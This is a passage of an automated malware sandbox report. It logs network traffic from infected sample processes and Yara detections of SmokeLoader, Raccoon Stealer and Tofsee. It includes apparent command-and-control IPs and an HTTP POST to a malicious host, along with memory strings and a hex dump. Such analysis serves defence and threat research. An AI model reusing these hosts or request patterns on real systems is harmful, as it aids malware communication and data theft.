01 5f 90 59 5c 82 a0 0e cb 2f 38 54 cf 18 96 0b af 06 26 0b 42 43 83 22 8d 75 8e da 3b be 0f 65 a9 6b 20 75 24 1e 81 cf 15 8f cd 7e 60 bd 7b 1c 21 ab 4d c8 09 f3 ae 5c 57 ac 59 a9 33 37 2b 6e 51 f5 5a 95 2a ab ea b1 c5 33 5c 47 15 bf 35 64 be a1 f8 90 5a 9f 68 56 4c cd ea 5a 1b 7c 6b 89 35 17 f7 ab 58 46 ac 59 1e cc 6c 56 56 57 9a d5 43 98 d8 7c bd fd 80 80 cf 62 fb aa 5c 93 5a 0f 95 87 6d 81 20 f3 03 30 f0 d4 d0 50 fe 46 38 7b 5d 90 55 11 70 da da 52 57 2c 6e 91 fb b5 4d 4d 1b d5 7f e8 c8 73 aa 1e c2 5f 40 b5 aa 3e 51
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.186.142.166
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.186.142.166
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.186.142.166
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: svchost.exe, 0000001D.00000003.809893808.00000188AC396000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","N equals www.facebook.com (Facebook)
                          Source: svchost.exe, 0000001D.00000003.809893808.00000188AC396000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","N equals www.twitter.com (Twitter)
                          Source: svchost.exe, 0000001D.00000003.809923692.00000188AC3A7000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.809893808.00000188AC396000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-01-07T11:33:20.1626869Z||.||d5cdcec3-04df-404e-ba07-3240047c89f9||1152921505694348672||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                          Source: svchost.exe, 0000001D.00000003.809923692.00000188AC3A7000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.809893808.00000188AC396000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-01-07T11:33:20.1626869Z||.||d5cdcec3-04df-404e-ba07-3240047c89f9||1152921505694348672||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                          Source: svchost.exe, 0000001D.00000003.809893808.00000188AC396000.00000004.00000001.sdmpString found in binary or memory: =strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify - Music and Podcasts","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NCBCSZSJRSB","Properties":{"FulfillmentData":{"ProductId":"9NCBCSZSJRSB","WuCategoryId":"5c353b9c-7ac7-4d27-af07-923e7d9aa2e2","PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","SkuId":"0011"},"FulfillmentType":"WindowsUpdate","FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"Spotify"}],"Architectures":["x86"],"Capabilities":["internetClient","runFullTrust","Microsoft.storeFilter.core.notSupported_8wekyb3d8bbwe"],"ExperienceIds":[],"MaxDownloadSizeInBytes":104380919,"MaxInstallSizeInBytes":203345920,"PackageFormat":"Appx","PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","MainPackageFamilyNameForDlc":null,"PackageFullName":"SpotifyAB.SpotifyMusic_1.176.447.0_x86__zpdnekdrzrea0","PackageId":"3fbafb47-f476-4c26-4445-49acb9a726e6-X86","PackageRank":30001,"PlatformDependencies":[{"MaxTested":2814750754275328,"MinVersion":2814750710366559,"PlatformName":"Windows.Desktop"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.isMain\":false,\"content.packageId\":\"SpotifyAB.SpotifyMusic_1.176.447.0_x86__zpdnekdrzrea0\",\"content.productId\":\"caac1b9d-621b-4f96-b143-e10e1397740a\",\"content.targetPlatforms\":[{\"platform.maxVersionTested\":2814750754275328,\"platform.minVersion\":2814750710366559,\"platform.target\":3}],\"content.type\":7,\"policy\":{\"category.first\":\"app\",\"category.second\":\"Music\",\"optOut.backupRestore\":true,\"optOut.removeableMedia\":false},\"policy2\":{\"ageRating\":3,\"optOut.DVR\":false,\"thirdPartyAppRatings\":[{\"level\":9,\"systemId\":3},{\"le
                          Source: svchost.exe, 0000001D.00000003.809893808.00000188AC396000.00000004.00000001.sdmpString found in binary or memory: =strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify - Music and Podcasts","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NCBCSZSJRSB","Properties":{"FulfillmentData":{"ProductId":"9NCBCSZSJRSB","WuCategoryId":"5c353b9c-7ac7-4d27-af07-923e7d9aa2e2","PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","SkuId":"0011"},"FulfillmentType":"WindowsUpdate","FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"Spotify"}],"Architectures":["x86"],"Capabilities":["internetClient","runFullTrust","Microsoft.storeFilter.core.notSupported_8wekyb3d8bbwe"],"ExperienceIds":[],"MaxDownloadSizeInBytes":104380919,"MaxInstallSizeInBytes":203345920,"PackageFormat":"Appx","PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","MainPackageFamilyNameForDlc":null,"PackageFullName":"SpotifyAB.SpotifyMusic_1.176.447.0_x86__zpdnekdrzrea0","PackageId":"3fbafb47-f476-4c26-4445-49acb9a726e6-X86","PackageRank":30001,"PlatformDependencies":[{"MaxTested":2814750754275328,"MinVersion":2814750710366559,"PlatformName":"Windows.Desktop"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.isMain\":false,\"content.packageId\":\"SpotifyAB.SpotifyMusic_1.176.447.0_x86__zpdnekdrzrea0\",\"content.productId\":\"caac1b9d-621b-4f96-b143-e10e1397740a\",\"content.targetPlatforms\":[{\"platform.maxVersionTested\":2814750754275328,\"platform.minVersion\":2814750710366559,\"platform.target\":3}],\"content.type\":7,\"policy\":{\"category.first\":\"app\",\"category.second\":\"Music\",\"optOut.backupRestore\":true,\"optOut.removeableMedia\":false},\"policy2\":{\"ageRating\":3,\"optOut.DVR\":false,\"thirdPartyAppRatings\":[{\"level\":9,\"systemId\":3},{\"le
                          Source: 8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmpString found in binary or memory: l9https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
                          Source: 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmpString found in binary or memory: romium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"*DivX Web Player*","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"*Facebook Video*","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"*Chrome PDF Viewer*","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"*Chrome PDF Plugin*","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"*Google Earth*","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"*Google Talk*","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"*IBM*Java*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-j
                          Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lkoyuevdx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 219Host: host-data-coin-11.com
                          Source: unknownHTTPS traffic detected: 185.233.81.115:443 -> 192.168.2.4:49792 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.4:49811 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.38.221:443 -> 192.168.2.4:49876 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49878 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49891 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49896 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.4:49947 version: TLS 1.2

                          Key, Mouse, Clipboard, Microphone and Screen Capturing:

                          barindex
                          Yara detected SmokeLoaderShow sources
                          Source: Yara matchFile source: 11.2.uufaeea.4615a0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.2.E666.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.2.U3E7zMaux2.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.0.E666.exe.400000.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.0.E666.exe.400000.6.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.0.U3E7zMaux2.exe.400000.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.1.U3E7zMaux2.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.1.E666.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.U3E7zMaux2.exe.5315a0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.0.U3E7zMaux2.exe.400000.6.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.0.E666.exe.400000.5.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 12.1.uufaeea.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 17.2.E666.exe.5415a0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.0.U3E7zMaux2.exe.400000.5.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 12.2.uufaeea.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000013.00000002.784101177.00000000006A1000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000007.00000000.700489251.00000000044E1000.00000020.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.713149753.00000000004F0000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000013.00000002.783879616.0000000000530000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.713456716.0000000002301000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000C.00000002.766896131.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000C.00000002.766831607.00000000004F0000.00000004.00000001.sdmp, type: MEMORY
                          Source: 86C4.exe, 00000015.00000002.803047827.00000000007FA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                          E-Banking Fraud:

                          barindex
                          Yara detected Raccoon StealerShow sources
                          Source: Yara matchFile source: 43.2.7801.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 43.2.7801.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 43.3.7801.exe.4e00000.3.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 43.3.7801.exe.4e00000.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000002B.00000003.856737411.0000000004E00000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002B.00000002.922477314.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 7801.exe PID: 7032, type: MEMORYSTR

                          Spam, unwanted Advertisements and Ransom Demands:

                          barindex
                          Yara detected TofseeShow sources
                          Source: Yara matchFile source: 21.2.86C4.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 36.2.lagavljy.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 21.2.86C4.exe.540e50.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 39.2.svchost.exe.320000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 36.2.lagavljy.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 36.2.lagavljy.exe.650000.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 36.2.lagavljy.exe.650000.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 36.3.lagavljy.exe.490000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 39.2.svchost.exe.320000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 21.3.86C4.exe.560000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 21.2.86C4.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 36.2.lagavljy.exe.470e50.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000027.00000002.922686278.0000000000320000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000015.00000002.797378726.0000000000540000.00000040.00000001.sdmp, type: MEMORY
